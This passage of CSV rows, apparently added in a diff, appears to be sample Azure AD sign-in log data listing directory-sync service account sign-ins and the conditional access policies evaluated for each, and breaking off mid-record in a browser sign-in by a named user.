'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",706e1892-a48a-4a34-be7e-877757fa1900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,706e1892-a48a-4a34-be7e-877757fa1900,SigninLogs,Sucess,36.6404686,-78.26995087
+1709,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:04.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8c541ef-9d53-4719-a9e2-b695b199eec7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d3a3c86e-d6a1-4323-9bc0-1a2670ad1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d3a3c86e-d6a1-4323-9bc0-1a2670ad1a00,SigninLogs,Sucess,36.6404686,-78.26995087
+1710,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:04.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8bffd729-abc8-4da6-9ae3-cf44f1d37ea4,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b3c0863d-787e-45d0-a1b5-da548d2e0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b3c0863d-787e-45d0-a1b5-da548d2e0200,SigninLogs,Sucess,36.6404686,-78.26995087
+1711,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:08.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d027f364-ca99-416d-a529-4e7a0f94a163,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",1138a221-02e6-466a-9195-236f5c9e0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1138a221-02e6-466a-9195-236f5c9e0100,SigninLogs,Sucess,36.6404686,-78.26995087
+1712,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3ca106d5-48bd-4b70-871b-9c73d341b398,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 20:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",98dc8e9a-f4c7-40e8-8c8c-df6518a51b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,98dc8e9a-f4c7-40e8-8c8c-df6518a51b00,SigninLogs,Sucess,36.6404686,-78.26995087
+1713,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:02.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5e2144db-695a-4225-b156-08097d57b5f0,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e9069a8f-c043-4e23-9435-a556ab640100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e9069a8f-c043-4e23-9435-a556ab640100,SigninLogs,Sucess,36.6404686,-78.26995087
+1714,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:04.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8ae2eb3-726f-445f-a77d-78550b53c353,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 22:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4aed1172-3ed3-4e97-ac91-0186d39c0300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4aed1172-3ed3-4e97-ac91-0186d39c0300,SigninLogs,Sucess,36.6404686,-78.26995087
+1715,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d6b9e5c3-0221-4542-93eb-e6f46684e35e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4c926580-a7d1-4f3d-971f-7f0b20011b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4c926580-a7d1-4f3d-971f-7f0b20011b00,SigninLogs,Sucess,36.6404686,-78.26995087
+1716,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:48.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9cae6bc9-488b-44de-a938-b85c59ebb98e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - 